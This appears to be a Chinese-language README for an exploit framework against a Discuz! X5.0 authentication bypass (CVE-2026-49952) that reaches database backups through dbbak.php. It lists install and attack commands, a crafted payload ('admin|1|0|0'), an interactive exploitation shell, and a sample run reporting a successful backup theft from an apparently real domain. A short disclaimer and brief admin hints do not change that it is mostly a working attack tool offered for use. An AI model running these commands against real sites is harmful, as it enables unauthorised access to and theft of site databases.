Discuz! X5.0认证绕过漏洞利用框架(CVE-2026-49952)- 关键漏洞,允许通过UC_KEY加密预言机令牌重用进行未认证的数据库备份访问。CVSS 9.1。功能齐全的工具,具有版本检测、多载荷攻击、交互式shell和自动化利用。仅限授权测试。
⚡ CVE-2026-49952 | CVSS 9.1(严重) | 版本 1.0.0
一个专业的渗透测试工具,用于识别并演示 Discuz! X5.0 中严重的身份验证绕过漏洞。
重要通知:此工具仅供教育目的和授权安全测试使用。 切勿在您不拥有或未获得明确许可的系统上使用此工具。 未经授权访问计算机系统是违法且不道德的。 作者对因使用此工具造成的任何误用或损害不承担任何责任。 使用此工具即表示您同意遵守所有适用的法律法规。
Discuz! X5.0 身份验证绕过利用框架旨在识别并演示 Discuz! X5.0(2026年3月20日至2026年5月1日发布版本)中严重的身份验证绕过漏洞(CVE-2026-49952)。
该漏洞允许未经身份验证的攻击者通过利用 UC_KEY 加密预言机进行令牌重用,从而访问数据库备份功能(dbbak.php),可能泄露敏感的数据库内容。
该漏洞存在于 dbbak.php 端点,其令牌验证机制依赖于 UC_KEY 加密预言机。攻击者通过在登录请求(member.php)中构造特定载荷,可获取有效的身份验证令牌,该令牌可被重用以访问数据库备份功能,而无需正确授权。
# 克隆仓库
git clone https://github.com/CerberusMrXi/Discuz-X5.0-Authentication-Bypass-Exploit-Framework
cd Discuz-X5.0-Authentication-Bypass-Exploit-Framework
# 安装必要包
pip install -r requirements.txt
# 验证安装
python3 exploit.py --help
# 构建 Docker 镜像
docker build -t exploit .
# 运行容器
docker run -it --rm exploit http://target.com
# 简单利用
python3 exploit.py http://target.com
# 指定输出文件
python3 exploit.py http://target.com --output results.txt
# 调试模式(详细输出)
python3 exploit.py http://target.com --verbose
# 使用代理和自定义线程数
python3 exploit.py https://target.com --proxy http://127.0.0.1:8080 --threads 10
# 自定义载荷
python3 exploit.py http://target.com --payload "admin|1|0|0"
python3 exploit.py http://discuz.eda.com.my
██████╗ ██╗███████╗██╗ ██╗███████╗███████╗██████╗
██╔══██╗██║██╔════╝██║ ██║╚══███╔╝╚══███╔╝╚════██╗
██║ ██║██║███████╗██║ ██║ ███╔╝ ███╔╝ █████╔╝
██║ ██║██║╚════██║██║ ██║ ███╔╝ ███╔╝ ██╔═══╝
██████╔╝██║███████║╚██████╔╝███████╗███████╗███████╗
╚═════╝ ╚═╝╚══════╝ ╚═════╝ ╚══════╝╚══════╝╚══════╝
Discuz! X5.0 身份验证绕过利用框架
CVE-2026-49952 | CVSS: 9.1(严重)
作者: Sudeepa Wanigarathna | 版本: 1.0.0
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[14:32:15] ► 阶段 1:目标侦察
[14:32:15] ➜ 测试与 http://discuz.eda.com.my 的连接
[14:32:16] ➜ 检测 Discuz! 版本...
[14:32:16] ✔ Discuz! 版本:X5.0
[14:32:16] ⚡ 目标运行在存在漏洞的版本!
[14:32:16] ► 阶段 2:Authcode 获取
[14:32:16] ➜ 使用载荷 admin|1|0|0 提取 authcode
[14:32:17] ✔ Authcode: aBcDeFgHiJkLmNoPqRsT...
[14:32:17] ► 阶段 3:利用
[14:32:17] ➜ 执行利用(操作:backup)
[14:32:18] ✔ 利用成功!
[14:32:18] ✔ 结果已保存至 discuz_exploit_20260724_143218.txt
╔══════════════════════════════════════════════════════════╗
║ 利用成功 ║
╠══════════════════════════════════════════════════════════╣
║ 目标: http://discuz.eda.com.my ║
║ Authcode: aBcDeFgHiJkLmNoPqRsT... ║
║ 状态: 数据库备份已访问 ║
║ 数据大小: 24567 字节 ║
║ 保存至: discuz_exploit_20260724_143218.txt ║
╚══════════════════════════════════════════════════════════╝
启动交互式 Shell 进行手动利用:
python3 discuz_exploit.py http://target.com --interactive
对于系统管理员:
dbbak.php。member.php 和 dbbak.php 访问记录。错误: 无法连接到目标
解决方案:
• 检查目标 URL 是否正确
• 验证网络连接
• 检查是否有防火墙阻止访问
• 尝试使用代理:--proxy http://your_proxy:port
• 确保目标在线且可访问
错误: 身份验证失败或 authcode 无效
解决方案:
• 确保目标 Discuz! 版本存在漏洞
• 尝试不同的载荷以提取 authcode
• 检查是否存在网络问题或 WAF 干扰
• 以详细模式运行(--verbose)以获取更多信息
本项目采用 MIT 许可证。
版权所有 © 2026 Sudeepa Wanigarathna
特此授予任何获得本软件副本及相关文档文件(以下简称“软件”)的人无偿处理本软件的权利,包括但不限于使用、复制、修改、合并、发布、分发、再许可和/或销售本软件副本的权利,并允许获得本软件的人这样做,但须满足以下条件:
上述版权声明和本许可声明应包含在本软件的所有副本或实质性部分中。
本软件按“原样”提供,不提供任何明示或暗示的担保,包括但不限于适销性、特定用途适用性和非侵权性的担保。在任何情况下,作者或版权持有人均不对因本软件或本软件的使用或其他交易而产生的任何索赔、损害或其他责任负责,无论是合同行为、侵权行为还是其他行为。
| 属性 | 详情 |
|---|
| 漏洞类型 | 身份验证绕过 |
| CVE ID | CVE-2026-49952 |
| CVSS 版本 | 3.1 |
| CVSS 评分 | 9.1(严重) |
| 攻击向量 | 网络 |
| 攻击复杂度 | 低 |
| 所需权限 | 无 |
| 用户交互 | 无 |
| 机密性影响 | 高 |
| 完整性影响 | 高 |
| 可用性影响 | 高 |
| 利用代码成熟度 | 功能可用 |
| 修复级别 | 官方已修复 |
| 命令 | 描述 | 示例 |
|---|
help | 显示所有可用命令 | help |
scan | 检测 Discuz! 版本并检查漏洞 | scan |
get [payload] | 提取 authcode(可选自定义载荷) | `get admin |
exploit [op] | 执行利用(默认:backup) | exploit backup |
save | 保存结果到文件 | save |
info | 显示会话信息 | info |
clear | 清除终端屏幕 | clear |
exit / quit | 退出交互式 Shell | exit |